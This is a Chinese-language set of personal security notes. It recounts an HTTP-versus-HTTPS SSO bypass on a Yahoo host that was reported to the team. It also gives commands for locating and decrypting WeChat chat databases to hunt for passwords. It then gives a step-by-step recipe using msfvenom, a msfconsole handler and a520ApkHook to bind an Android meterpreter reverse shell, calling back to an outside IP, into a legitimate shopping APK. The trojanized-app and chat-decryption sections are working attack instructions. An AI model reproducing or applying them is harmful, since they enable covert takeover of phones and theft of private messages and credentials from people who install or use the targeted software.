随手记

一、记一次SSO绕过的漏洞挖掘

  1. foo.bar.yahoo.com检查wayback 机器上的主机名。
  2. 找到一个索引页面:https://foo.bar.yahoo.com/page1/endpoint/
  3. 转到此页面,它会重定向到 Okta SSO。
  4. 使用探测https和http两个端口httpx。
  5. http://foo.bar.yahoo.com/page1/endpoint也得到了结果。
  6. 两个页面的内容长度https不同http。
  7. 转到http://foo.bar.yahoo.com/page/endpoint,整个页面都可以直接访问。
  8. 主机正在显示 adtraffic。我试着用谷歌搜索这些术语,最终直接向团队报告,因为这些术语和结果超出了我的大脑范围。

二、攻防演练中解密微信聊天记录寻找密码的Tips

  1. SharpWxDump

    **查找微信数据库**
    dir /a /s /b d:\\*.db | findstr "MSG0.DB"
    
    解密聊天记录
    使用解密脚本:python Decode.py -k 4988C45601A6***************8115FF6D840A -d MSG0.db
    

三、将安卓远控Apk附加进普通的App中,运行新生成的App时,普通App正常运行,远控正常上线

    1. 下载Releases中打包好的jar包:a520ApkHook-1.0-jar-with-dependencies.jar
  1. msfmsfvenom

    msfvenom -p android/meterpreter/reverse_tcp lhost=114.114.114.114 lport=3306 -o ~/Downloads/msf.apk
    
  2. msfconsole

    # 启动 msfconsole
    
    use exploit/multi/handler
    set payload android/meterpreter/reverse_tcp
    set lhost 0.0.0.0
    set lport 3306
    set exitonsession false
    exploit -j
    
  3. 520ApkHook

    java -jar a520ApkHook-1.0-jar-with-dependencies.jar  ~/Downloads/京东.apk ~/Downloads/msf.apk